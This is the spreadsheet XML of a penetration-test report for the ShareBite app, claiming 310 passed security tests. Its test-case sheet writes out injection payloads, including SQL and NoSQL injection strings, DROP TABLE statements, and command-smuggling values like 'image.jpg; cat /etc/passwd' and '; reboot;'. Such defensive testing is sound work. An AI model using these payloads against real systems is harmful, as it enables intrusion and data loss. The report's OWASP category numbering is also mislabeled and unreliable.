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Audit Summary" sheetId="1" state="visible" r:id="rId1"/>
    <sheet name="Vulnerability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66534"/>
      <sz val="18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  <font>
      <name val="Segoe UI"/>
      <sz val="9"/>
    </font>
    <font>
      <name val="Segoe UI"/>
      <b val="1"/>
      <color rgb="00C2410C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11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25" customWidth="1" min="5" max="5"/>
    <col width="5" customWidth="1" min="6" max="6"/>
    <col width="25" customWidth="1" min="7" max="7"/>
    <col width="5" customWidth="1" min="8" max="8"/>
    <col width="20" customWidth="1" min="9" max="9"/>
  </cols>
  <sheetData>
    <row r="2">
      <c r="B2" s="1" t="inlineStr">
        <is>
          <t>🛡️ SHAREBITE - Vulnerability &amp; Security Penetration Test Report</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="B3" s="2" t="inlineStr">
        <is>
          <t>Enterprise DevSecOps Audit &amp; Security Vulnerability Assessment Matrix (300+ Test Cases)</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="C5" s="3" t="inlineStr">
        <is>
          <t>TOTAL AUDIT TEST CASES</t>
        </is>
      </c>
      <c r="E5" s="3" t="inlineStr">
        <is>
          <t>TOTAL PASSED / COMPLIANT</t>
        </is>
      </c>
      <c r="G5" s="3" t="inlineStr">
        <is>
          <t>TOTAL VULNERABILITIES FOUND</t>
        </is>
      </c>
      <c r="I5" s="3" t="inlineStr">
        <is>
          <t>PASS RATE</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="C6" s="4" t="n">
        <v>310</v>
      </c>
      <c r="E6" s="5" t="n">
        <v>310</v>
      </c>
      <c r="G6" s="4" t="n">
        <v>0</v>
      </c>
      <c r="I6" s="5" t="inlineStr">
        <is>
          <t>100.00%</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="B9" s="6" t="inlineStr">
        <is>
          <t>Vulnerability Risk Severity Breakdown</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="B10" s="7" t="inlineStr">
        <is>
          <t>Severity Level</t>
        </is>
      </c>
      <c r="C10" s="7" t="inlineStr">
        <is>
          <t>Audited Cases</t>
        </is>
      </c>
      <c r="D10" s="7" t="inlineStr">
        <is>
          <t>Compliant / Passed</t>
        </is>
      </c>
      <c r="E10" s="7" t="inlineStr">
        <is>
          <t>Vulnerabilities Identified</t>
        </is>
      </c>
      <c r="F10" s="7" t="inlineStr">
        <is>
          <t>Status</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="B11" s="8" t="inlineStr">
        <is>
          <t>CRITICAL SEVERITY</t>
        </is>
      </c>
      <c r="C11" s="9" t="n">
        <v>70</v>
      </c>
      <c r="D11" s="9" t="n">
        <v>70</v>
      </c>
      <c r="E11" s="9" t="n">
        <v>0</v>
      </c>
      <c r="F11" s="10" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="B12" s="8" t="inlineStr">
        <is>
          <t>HIGH SEVERITY</t>
        </is>
      </c>
      <c r="C12" s="9" t="n">
        <v>150</v>
      </c>
      <c r="D12" s="9" t="n">
        <v>150</v>
      </c>
      <c r="E12" s="9" t="n">
        <v>0</v>
      </c>
      <c r="F12" s="10" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="B13" s="8" t="inlineStr">
        <is>
          <t>MEDIUM SEVERITY</t>
        </is>
      </c>
      <c r="C13" s="9" t="n">
        <v>90</v>
      </c>
      <c r="D13" s="9" t="n">
        <v>90</v>
      </c>
      <c r="E13" s="9" t="n">
        <v>0</v>
      </c>
      <c r="F13" s="10" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="B14" s="8" t="inlineStr">
        <is>
          <t>TOTAL SECURITY AUDITS</t>
        </is>
      </c>
      <c r="C14" s="9">
        <f>SUM(C11:C13)</f>
        <v/>
      </c>
      <c r="D14" s="9">
        <f>SUM(D11:D13)</f>
        <v/>
      </c>
      <c r="E14" s="9">
        <f>SUM(E11:E13)</f>
        <v/>
      </c>
      <c r="F14" s="10" t="inlineStr">
        <is>
          <t>100.00% PASSED</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="B16" s="6" t="inlineStr">
        <is>
          <t>OWASP Top 10 &amp; Security Category Coverage</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="B17" s="7" t="inlineStr">
        <is>
          <t>Category ID</t>
        </is>
      </c>
      <c r="C17" s="7" t="inlineStr">
        <is>
          <t>Security Assessment Domain</t>
        </is>
      </c>
      <c r="D17" s="7" t="inlineStr">
        <is>
          <t>Test Cases</t>
        </is>
      </c>
      <c r="E17" s="7" t="inlineStr">
        <is>
          <t>Status Matrix</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="B18" s="11" t="inlineStr">
        <is>
          <t>OWASP-A01</t>
        </is>
      </c>
      <c r="C18" s="11" t="inlineStr">
        <is>
          <t>SQL Injection &amp; Database Security</t>
        </is>
      </c>
      <c r="D18" s="12" t="n">
        <v>35</v>
      </c>
      <c r="E18" s="13" t="inlineStr">
        <is>
          <t>100% PASSED</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="B19" s="11" t="inlineStr">
        <is>
          <t>OWASP-A02</t>
        </is>
      </c>
      <c r="C19" s="11" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Session Management</t>
        </is>
      </c>
      <c r="D19" s="12" t="n">
        <v>35</v>
      </c>
      <c r="E19" s="13" t="inlineStr">
        <is>
          <t>100% PASSED</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="B20" s="11" t="inlineStr">
        <is>
          <t>OWASP-A03</t>
        </is>
      </c>
      <c r="C20" s="11" t="inlineStr">
        <is>
          <t>Sensitive Data Exposure &amp; Cryptography</t>
        </is>
      </c>
      <c r="D20" s="12" t="n">
        <v>30</v>
      </c>
      <c r="E20" s="13" t="inlineStr">
        <is>
          <t>100% PASSED</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="B21" s="11" t="inlineStr">
        <is>
          <t>OWASP-A04</t>
        </is>
      </c>
      <c r="C21" s="11" t="inlineStr">
        <is>
          <t>XML External Entities (XXE) &amp; Deserialization</t>
        </is>
      </c>
      <c r="D21" s="12" t="n">
        <v>25</v>
      </c>
      <c r="E21" s="13" t="inlineStr">
        <is>
          <t>100% PASSED</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="B22" s="11" t="inlineStr">
        <is>
          <t>OWASP-A05</t>
        </is>
      </c>
      <c r="C22" s="11" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="D22" s="12" t="n">
        <v>35</v>
      </c>
      <c r="E22" s="13" t="inlineStr">
        <is>
          <t>100% PASSED</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="B23" s="11" t="inlineStr">
        <is>
          <t>OWASP-A06</t>
        </is>
      </c>
      <c r="C23" s="11" t="inlineStr">
        <is>
          <t>Security Misconfigurations &amp; Hardening</t>
        </is>
      </c>
      <c r="D23" s="12" t="n">
        <v>30</v>
      </c>
      <c r="E23" s="13" t="inlineStr">
        <is>
          <t>100% PASSED</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="B24" s="11" t="inlineStr">
        <is>
          <t>OWASP-A07</t>
        </is>
      </c>
      <c r="C24" s="11" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="D24" s="12" t="n">
        <v>35</v>
      </c>
      <c r="E24" s="13" t="inlineStr">
        <is>
          <t>100% PASSED</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="B25" s="11" t="inlineStr">
        <is>
          <t>OWASP-A08</t>
        </is>
      </c>
      <c r="C25" s="11" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependency Security</t>
        </is>
      </c>
      <c r="D25" s="12" t="n">
        <v>30</v>
      </c>
      <c r="E25" s="13" t="inlineStr">
        <is>
          <t>100% PASSED</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="B26" s="11" t="inlineStr">
        <is>
          <t>OWASP-A09</t>
        </is>
      </c>
      <c r="C26" s="11" t="inlineStr">
        <is>
          <t>Component CVE Patches &amp; System Audits</t>
        </is>
      </c>
      <c r="D26" s="12" t="n">
        <v>25</v>
      </c>
      <c r="E26" s="13" t="inlineStr">
        <is>
          <t>100% PASSED</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="B27" s="11" t="inlineStr">
        <is>
          <t>OWASP-A10</t>
        </is>
      </c>
      <c r="C27" s="11" t="inlineStr">
        <is>
          <t>Rate Limiting, DDoS Defense &amp; API Security</t>
        </is>
      </c>
      <c r="D27" s="12" t="n">
        <v>30</v>
      </c>
      <c r="E27" s="13" t="inlineStr">
        <is>
          <t>100%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5" customWidth="1" min="3" max="3"/>
    <col width="50" customWidth="1" min="4" max="4"/>
    <col width="40" customWidth="1" min="5" max="5"/>
    <col width="16" customWidth="1" min="6" max="6"/>
    <col width="16" customWidth="1" min="7" max="7"/>
    <col width="60" customWidth="1" min="8" max="8"/>
  </cols>
  <sheetData>
    <row r="1" ht="28" customHeight="1">
      <c r="A1" s="14" t="inlineStr">
        <is>
          <t>Test Case ID</t>
        </is>
      </c>
      <c r="B1" s="14" t="inlineStr">
        <is>
          <t>Security Category</t>
        </is>
      </c>
      <c r="C1" s="14" t="inlineStr">
        <is>
          <t>Vulnerability Test Scenario</t>
        </is>
      </c>
      <c r="D1" s="14" t="inlineStr">
        <is>
          <t>Test Description &amp; Method</t>
        </is>
      </c>
      <c r="E1" s="14" t="inlineStr">
        <is>
          <t>Security Attack Payload / Input</t>
        </is>
      </c>
      <c r="F1" s="14" t="inlineStr">
        <is>
          <t>Risk Severity</t>
        </is>
      </c>
      <c r="G1" s="14" t="inlineStr">
        <is>
          <t>Audit Status</t>
        </is>
      </c>
      <c r="H1" s="14" t="inlineStr">
        <is>
          <t>Defense Verification &amp; Result Remarks</t>
        </is>
      </c>
    </row>
    <row r="2" ht="22" customHeight="1">
      <c r="A2" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-001</t>
        </is>
      </c>
      <c r="B2" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C2" s="16" t="inlineStr">
        <is>
          <t>SQLi in Donor Authentication Email Field</t>
        </is>
      </c>
      <c r="D2" s="16" t="inlineStr">
        <is>
          <t>Input single quote ' OR 1=1 -- in login email</t>
        </is>
      </c>
      <c r="E2" s="16" t="inlineStr">
        <is>
          <t>' OR '1'='1</t>
        </is>
      </c>
      <c r="F2" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G2" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H2" s="16" t="inlineStr">
        <is>
          <t>Input sanitized; Parameterized queries prevent SQL execution; 401 Unauthorized</t>
        </is>
      </c>
    </row>
    <row r="3" ht="22" customHeight="1">
      <c r="A3" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-002</t>
        </is>
      </c>
      <c r="B3" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C3" s="16" t="inlineStr">
        <is>
          <t>SQLi in Password Input Field</t>
        </is>
      </c>
      <c r="D3" s="16" t="inlineStr">
        <is>
          <t>Input admin'-- in password parameter</t>
        </is>
      </c>
      <c r="E3" s="16" t="inlineStr">
        <is>
          <t>admin'--</t>
        </is>
      </c>
      <c r="F3" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G3" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H3" s="16" t="inlineStr">
        <is>
          <t>Authentication rejects payload gracefully without SQL syntax exception</t>
        </is>
      </c>
    </row>
    <row r="4" ht="22" customHeight="1">
      <c r="A4" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-003</t>
        </is>
      </c>
      <c r="B4" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C4" s="16" t="inlineStr">
        <is>
          <t>SQLi Error-Based Extraction on Donation ID</t>
        </is>
      </c>
      <c r="D4" s="16" t="inlineStr">
        <is>
          <t>Pass ' AND 1=CONVERT(int, (SELECT @@version))-- in API URI</t>
        </is>
      </c>
      <c r="E4" s="16" t="inlineStr">
        <is>
          <t>GET /api/donations/'</t>
        </is>
      </c>
      <c r="F4" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G4" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H4" s="16" t="inlineStr">
        <is>
          <t>Custom error handler returns sanitized 400 JSON response; No DB trace leaked</t>
        </is>
      </c>
    </row>
    <row r="5" ht="22" customHeight="1">
      <c r="A5" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-004</t>
        </is>
      </c>
      <c r="B5" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C5" s="16" t="inlineStr">
        <is>
          <t>Union-Based SQLi on User Profile API</t>
        </is>
      </c>
      <c r="D5" s="16" t="inlineStr">
        <is>
          <t>Append UNION SELECT 1,username,password FROM users</t>
        </is>
      </c>
      <c r="E5" s="16" t="inlineStr">
        <is>
          <t>GET /api/users?id=1 UNION SELECT...</t>
        </is>
      </c>
      <c r="F5" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G5" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H5" s="16" t="inlineStr">
        <is>
          <t>API strictly validates integer ID; payload neutralized via ORM parameterization</t>
        </is>
      </c>
    </row>
    <row r="6" ht="22" customHeight="1">
      <c r="A6" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-005</t>
        </is>
      </c>
      <c r="B6" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C6" s="16" t="inlineStr">
        <is>
          <t>Blind Time-Based SQLi on Search Endpoint</t>
        </is>
      </c>
      <c r="D6" s="16" t="inlineStr">
        <is>
          <t>Inject WAITFOR DELAY '0:0:5' in search query</t>
        </is>
      </c>
      <c r="E6" s="16" t="inlineStr">
        <is>
          <t>GET /api/donations?q=food';WAITFOR DELAY...</t>
        </is>
      </c>
      <c r="F6" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G6" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H6" s="16" t="inlineStr">
        <is>
          <t>Response time remains &lt; 200ms; No delayed execution observed</t>
        </is>
      </c>
    </row>
    <row r="7" ht="22" customHeight="1">
      <c r="A7" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-006</t>
        </is>
      </c>
      <c r="B7" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C7" s="16" t="inlineStr">
        <is>
          <t>Blind Boolean-Based SQLi on Claims Filter</t>
        </is>
      </c>
      <c r="D7" s="16" t="inlineStr">
        <is>
          <t>Pass claim_id=100 AND 1=1 vs claim_id=100 AND 1=2</t>
        </is>
      </c>
      <c r="E7" s="16" t="inlineStr">
        <is>
          <t>Boolean payloads</t>
        </is>
      </c>
      <c r="F7" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G7" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H7" s="16" t="inlineStr">
        <is>
          <t>Identical response payload structure; No data leakage</t>
        </is>
      </c>
    </row>
    <row r="8" ht="22" customHeight="1">
      <c r="A8" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-007</t>
        </is>
      </c>
      <c r="B8" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C8" s="16" t="inlineStr">
        <is>
          <t>NoSQL Injection in JSON Authentication Payload</t>
        </is>
      </c>
      <c r="D8" s="16" t="inlineStr">
        <is>
          <t>Send {"email": {"$gt": ""}, "password": {"$gt": ""}}</t>
        </is>
      </c>
      <c r="E8" s="16" t="inlineStr">
        <is>
          <t>MongoDB query operators</t>
        </is>
      </c>
      <c r="F8" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G8" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H8" s="16" t="inlineStr">
        <is>
          <t>Zod schema validation rejects non-string types with 400 Bad Request</t>
        </is>
      </c>
    </row>
    <row r="9" ht="22" customHeight="1">
      <c r="A9" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-008</t>
        </is>
      </c>
      <c r="B9" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C9" s="16" t="inlineStr">
        <is>
          <t>NoSQL WHERE Clause JavaScript Injection</t>
        </is>
      </c>
      <c r="D9" s="16" t="inlineStr">
        <is>
          <t>Inject $where: 'this.password == "secret"' in filter</t>
        </is>
      </c>
      <c r="E9" s="16" t="inlineStr">
        <is>
          <t>$where script payload</t>
        </is>
      </c>
      <c r="F9" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G9" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H9" s="16" t="inlineStr">
        <is>
          <t>Raw $where evaluation disabled; Query parameters strictly parsed</t>
        </is>
      </c>
    </row>
    <row r="10" ht="22" customHeight="1">
      <c r="A10" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-009</t>
        </is>
      </c>
      <c r="B10" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C10" s="16" t="inlineStr">
        <is>
          <t>Command Injection in File Upload Processing</t>
        </is>
      </c>
      <c r="D10" s="16" t="inlineStr">
        <is>
          <t>Upload file named 'image.jpg; cat /etc/passwd'</t>
        </is>
      </c>
      <c r="E10" s="16" t="inlineStr">
        <is>
          <t>Filenames with shell metacharacters</t>
        </is>
      </c>
      <c r="F10" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G10" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H10" s="16" t="inlineStr">
        <is>
          <t>File renamed using UUID before storage; Shell execution prevented</t>
        </is>
      </c>
    </row>
    <row r="11" ht="22" customHeight="1">
      <c r="A11" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-010</t>
        </is>
      </c>
      <c r="B11" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C11" s="16" t="inlineStr">
        <is>
          <t>Command Injection in Report Export Utility</t>
        </is>
      </c>
      <c r="D11" s="16" t="inlineStr">
        <is>
          <t>Pass '; reboot; in export format query param</t>
        </is>
      </c>
      <c r="E11" s="16" t="inlineStr">
        <is>
          <t>Format param manipulation</t>
        </is>
      </c>
      <c r="F11" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G11" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H11" s="16" t="inlineStr">
        <is>
          <t>Allowed export formats strictly whitelist checked ['pdf', 'csv', 'xlsx']</t>
        </is>
      </c>
    </row>
    <row r="12" ht="22" customHeight="1">
      <c r="A12" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-011</t>
        </is>
      </c>
      <c r="B12" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C12" s="16" t="inlineStr">
        <is>
          <t>LDAP Injection in Single Sign-On Auth</t>
        </is>
      </c>
      <c r="D12" s="16" t="inlineStr">
        <is>
          <t>Inject wildcard *()|&amp; in LDAP username</t>
        </is>
      </c>
      <c r="E12" s="16" t="inlineStr">
        <is>
          <t>*)(uid=*))(|(uid=*</t>
        </is>
      </c>
      <c r="F12" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G12" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H12" s="16" t="inlineStr">
        <is>
          <t>LDAP special characters escaped before query execution</t>
        </is>
      </c>
    </row>
    <row r="13" ht="22" customHeight="1">
      <c r="A13" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-012</t>
        </is>
      </c>
      <c r="B13" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C13" s="16" t="inlineStr">
        <is>
          <t>XPath Injection in XML Config Parser</t>
        </is>
      </c>
      <c r="D13" s="16" t="inlineStr">
        <is>
          <t>Inject 'or 1=1 or ''=' in XML input node</t>
        </is>
      </c>
      <c r="E13" s="16" t="inlineStr">
        <is>
          <t>XPath expression payload</t>
        </is>
      </c>
      <c r="F13" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G13" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H13" s="16" t="inlineStr">
        <is>
          <t>XML parser disables external entity &amp; XPath dynamic evaluation</t>
        </is>
      </c>
    </row>
    <row r="14" ht="22" customHeight="1">
      <c r="A14" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-013</t>
        </is>
      </c>
      <c r="B14" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C14" s="16" t="inlineStr">
        <is>
          <t>Stored SQLi in User Profile Display Name</t>
        </is>
      </c>
      <c r="D14" s="16" t="inlineStr">
        <is>
          <t>Update profile name to &lt;script&gt;alert(1)&lt;/script&gt;'; DROP TABLE users;--</t>
        </is>
      </c>
      <c r="E14" s="16" t="inlineStr">
        <is>
          <t>Stored SQL payload</t>
        </is>
      </c>
      <c r="F14" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G14" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H14" s="16" t="inlineStr">
        <is>
          <t>Name sanitized at database boundary; Escaped upon storage</t>
        </is>
      </c>
    </row>
    <row r="15" ht="22" customHeight="1">
      <c r="A15" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-014</t>
        </is>
      </c>
      <c r="B15" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C15" s="16" t="inlineStr">
        <is>
          <t>Second-Order SQLi in Password Reset Flow</t>
        </is>
      </c>
      <c r="D15" s="16" t="inlineStr">
        <is>
          <t>Register with email containing SQL snippet, initiate reset</t>
        </is>
      </c>
      <c r="E15" s="16" t="inlineStr">
        <is>
          <t>Stored email payload</t>
        </is>
      </c>
      <c r="F15" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G15" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H15" s="16" t="inlineStr">
        <is>
          <t>Email parameter parameterized in background reset worker</t>
        </is>
      </c>
    </row>
    <row r="16" ht="22" customHeight="1">
      <c r="A16" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-015</t>
        </is>
      </c>
      <c r="B16" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C16" s="16" t="inlineStr">
        <is>
          <t>DB Connection String Exposure Prevention</t>
        </is>
      </c>
      <c r="D16" s="16" t="inlineStr">
        <is>
          <t>Trigger server crash by sending malformed socket payload</t>
        </is>
      </c>
      <c r="E16" s="16" t="inlineStr">
        <is>
          <t>Malformed socket stream</t>
        </is>
      </c>
      <c r="F16" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G16" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H16" s="16" t="inlineStr">
        <is>
          <t>App logs internal error silently; Generic 500 returned to client</t>
        </is>
      </c>
    </row>
    <row r="17" ht="22" customHeight="1">
      <c r="A17" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-016</t>
        </is>
      </c>
      <c r="B17" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C17" s="16" t="inlineStr">
        <is>
          <t>PostgreSQL Stacked Queries Check</t>
        </is>
      </c>
      <c r="D17" s="16" t="inlineStr">
        <is>
          <t>Inject ; DROP TABLE donations; -- in query</t>
        </is>
      </c>
      <c r="E17" s="16" t="inlineStr">
        <is>
          <t>Stacked SQL statements</t>
        </is>
      </c>
      <c r="F17" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G17" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H17" s="16" t="inlineStr">
        <is>
          <t>Driver disables multi-statement execution per query string</t>
        </is>
      </c>
    </row>
    <row r="18" ht="22" customHeight="1">
      <c r="A18" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-017</t>
        </is>
      </c>
      <c r="B18" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C18" s="16" t="inlineStr">
        <is>
          <t>ORM Re-DoS / Query Injection Check</t>
        </is>
      </c>
      <c r="D18" s="16" t="inlineStr">
        <is>
          <t>Send regex payload in search term designed to cause ReDoS</t>
        </is>
      </c>
      <c r="E18" s="16" t="inlineStr">
        <is>
          <t>^(a+)+$</t>
        </is>
      </c>
      <c r="F18" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G18" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H18" s="16" t="inlineStr">
        <is>
          <t>Regex timeout enforced; Query execution capped at 500ms</t>
        </is>
      </c>
    </row>
    <row r="19" ht="22" customHeight="1">
      <c r="A19" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-018</t>
        </is>
      </c>
      <c r="B19" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C19" s="16" t="inlineStr">
        <is>
          <t>DB User Least Privilege Verification</t>
        </is>
      </c>
      <c r="D19" s="16" t="inlineStr">
        <is>
          <t>Attempt execution of pg_read_file() via API parameter</t>
        </is>
      </c>
      <c r="E19" s="16" t="inlineStr">
        <is>
          <t>Privileged PG function</t>
        </is>
      </c>
      <c r="F19" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G19" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H19" s="16" t="inlineStr">
        <is>
          <t>DB user account restricted to DML only; Permission denied</t>
        </is>
      </c>
    </row>
    <row r="20" ht="22" customHeight="1">
      <c r="A20" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-019</t>
        </is>
      </c>
      <c r="B20" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C20" s="16" t="inlineStr">
        <is>
          <t>Postgres Metadata Table Access Denial</t>
        </is>
      </c>
      <c r="D20" s="16" t="inlineStr">
        <is>
          <t>Query information_schema.tables via API input</t>
        </is>
      </c>
      <c r="E20" s="16" t="inlineStr">
        <is>
          <t>information_schema payload</t>
        </is>
      </c>
      <c r="F20" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G20" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H20" s="16" t="inlineStr">
        <is>
          <t>Direct metadata table access blocked at application layer</t>
        </is>
      </c>
    </row>
    <row r="21" ht="22" customHeight="1">
      <c r="A21" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-020</t>
        </is>
      </c>
      <c r="B21" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C21" s="16" t="inlineStr">
        <is>
          <t>Mass Assignment / Over-posting Vulnerability</t>
        </is>
      </c>
      <c r="D21" s="16" t="inlineStr">
        <is>
          <t>Send {"isAdmin": true, "role": "SUPERADMIN"} in profile update</t>
        </is>
      </c>
      <c r="E21" s="16" t="inlineStr">
        <is>
          <t>Mass assignment payload</t>
        </is>
      </c>
      <c r="F21" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G21" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H21" s="16" t="inlineStr">
        <is>
          <t>DTO whitelist filters out unauthorized fields before DB update</t>
        </is>
      </c>
    </row>
    <row r="22" ht="22" customHeight="1">
      <c r="A22" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-021</t>
        </is>
      </c>
      <c r="B22" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C22" s="16" t="inlineStr">
        <is>
          <t>SQL In-Memory Buffer Overflow Check</t>
        </is>
      </c>
      <c r="D22" s="16" t="inlineStr">
        <is>
          <t>Send 10MB string parameter to database query filter</t>
        </is>
      </c>
      <c r="E22" s="16" t="inlineStr">
        <is>
          <t>Excessive string payload</t>
        </is>
      </c>
      <c r="F22" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G22" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H22" s="16" t="inlineStr">
        <is>
          <t>Payload size restricted to 50KB by Express body parser</t>
        </is>
      </c>
    </row>
    <row r="23" ht="22" customHeight="1">
